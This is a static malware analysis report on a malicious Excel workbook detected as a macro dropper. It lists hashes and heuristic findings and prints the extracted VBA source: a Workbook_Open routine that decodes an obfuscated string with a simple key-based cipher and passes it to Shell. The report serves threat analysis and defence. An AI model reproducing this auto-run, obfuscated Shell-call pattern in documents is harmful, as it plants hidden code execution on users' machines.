Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae26246a4c3c3ea3…

MALICIOUS

Office (OOXML)

128.7 KB Created: 2020-11-01 22:23:15 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-11-05
MD5: 7514caa14878e148d8e9305a51756fcd SHA-1: ddfadff6d2d1e5c740d95cd0f46baf8c781a62fb SHA-256: ae26246a4c3c3ea310b44afd90d15b9f4c79071a94311def0ce28afd26d6bb1a
148 Risk Score

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-9823786-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-9823786-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv("§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€", "qddwdwqdqw")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2264 bytes
SHA-256: 8f8fbdde4e0d689752837e310bd41038be2b8963cba2844f0871b3fddf791343
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
'shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv(§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€)
Shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv("§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€", "qddwdwqdqw")
End Sub
Private Function LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv(strText As String, ByVal strPwd As String)
    Dim i As Integer, c As Integer
    Dim strBuff As String
#If Not CASE_SENSITIVE_PASSWORD Then
    strPwd = UCase$(strPwd)
#End If
    If Len(strPwd) Then
        For i = 1 To Len(strText)
            c = Asc(Mid$(strText, i, 1))
            c = c - Asc(Mid$(strPwd, (i Mod Len(strPwd)) + 1, 1))
            strBuff = strBuff & Chr(c And &HFF)
        Next i
    Else
        strBuff = strText
    End If
    LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv = strBuff
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 14336 bytes
SHA-256: b3e26c56382b846a0b47c22cd532188de74f9bcbbf00a07ce21554ce3d26c1a8